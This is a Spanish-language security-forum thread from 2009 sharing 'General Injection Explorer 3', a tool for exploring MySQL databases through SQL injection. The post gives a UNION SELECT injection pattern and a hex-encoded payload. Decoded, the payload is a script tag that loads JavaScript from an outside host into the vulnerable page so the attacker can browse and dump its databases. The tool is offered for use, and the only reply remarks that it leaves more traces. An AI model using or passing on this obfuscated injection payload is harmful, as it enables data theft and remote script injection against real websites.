La Comunidad DragonJAR  

Retroceder   La Comunidad DragonJAR > Seguridad > Seguridad Web
Actualizar esta página General Injection Explorer 3
Registrarse Ayuda Calendario Marcar Foros Como Leídos

¿Qué es La Comunidad DragonJAR?

DragonJAR.org es una comunidad de investigadores, estudiantes, profesionales y entusiastas de la Seguridad Informática, En la cual se busca darle un enfoque eminentemente práctico a la teoría sin olvidar las bases esenciales de esta.

De esta manera se Tratará de ofrecer soluciones útiles a los usuarios, tanto novatos, estudiantes, como a los profesionales e investigadores, Teniendo presente que el mundo de la seguridad informática y la información es un medio que se auto inventa constantemente.

La Comunidad DragonJAR es un espacio abierto y libre para cualquier persona que desee compatir en un ambiente digital sus conocimientos o sus dudas. El registro es gratuito, toma poco tiempo y te permite disfrutar de todas las características del sitio.

Si es tu primera visita, quizás deberías visitar la Ayuda para aprender un poco sobre el uso de los foros, para empezar a ver mensajes, selecciona el foro que quieres visitar de la lista de abajo.

Respuesta
 
LinkBack Herramientas Desplegado
Antiguo 12-Dec-2009, 19:46   #1
Dragonauta Oficial
 
Avatar de Shell Root
 
Fecha de Ingreso: 09-August-2009
Ubicación: LocalHost
Mensajes: 691
Gracias: 2
Agradecido 268 veces en 151 Mensajes
Shell Root llegará a ser famoso muy pronto
Predeterminado General Injection Explorer 3
General Injection Explorer 3


Navegando por la Red, me encontre con esto, que me parecio muy curioso e ingenioso. Se trata de automatizar nuestras Inyecciones SQL.


[ + ] Que es?
Basicamente es un explorador de bases de datos MySQL via SQLi, "incrustado" en la inyección.

[ + ] Que tiene la version 3.0?
[+] Codeado desde 0.
[+] Bypasseo de "illegal operation", y limite de group_concat_max_len.
[+] Mejor manejo de CSS && DIVS.
[+] Peticiones realizadas con AJAX.
[+] Nueva forma de ver tablas, MUCHO mas ordenadas.
[ + ] Como se usa?
En una SQLi, unis otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
En un valor que printee (que se muestre en la web), simplemente copias y pegas el codigo de la GIE.
Código:
(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)
Ejemplo Sin GIE: :::::: Adegas galegas :::::::
Ejemplo Con GIE: :::::: Adegas galegas :::::::

Luego, se navegan las bases de datos, usando ese "cuadradito" como un mini-phpmyadmin :P como se ve en el siguiente [.gif]:


Codigo: http://virtux.com.ar/GIE/_.js

By: PonyMagic
__________________
"Una vulnerabilidad es tan limitada como tu quieras que sea"
---
"La vida no es más que una histora de mierda demasiado corta"
Shell Root esta en línea ahora   Responder Citando
Los siguientes Usuarios dicen Gracias a Shell Root por este util Mensaje:
DragoN (14-Dec-2009)
Antiguo 14-Dec-2009, 12:29   #2
Administradores
 
Avatar de DragoN
 
Fecha de Ingreso: 11-August-2008
Ubicación: Manizales
Mensajes: 1.013
Gracias: 418
Agradecido 311 veces en 148 Mensajes
DragoN está en el buen camino
Predeterminado
Bastante interesante e interactiva la herramienta, pero... deja mas rastro que una inyección sql normal...
DragoN está desconectado   Responder Citando
Respuesta

Etiquetas
explorer, general, injection

« Tema Anterior | Próximo Tema »
Herramientas
Desplegado
Mode Lineal Mode Lineal

Normas de Publicación
No puedes crear nuevos temas
No puedes responder mensajes
No puedes subir archivos adjuntos
No puedes editar tus mensajes
Los Códigos BB están Activado
Las Caritas están Activado
[IMG] está Activado
El Código HTML está Desactivado
Trackbacks are Activado
Pingbacks are Activado
Refbacks are Activado


La franja horaria es GMT -6. Ahora son las 18:29.

Contáctenos - La Comunidad DragonJAR - Archivo - Arriba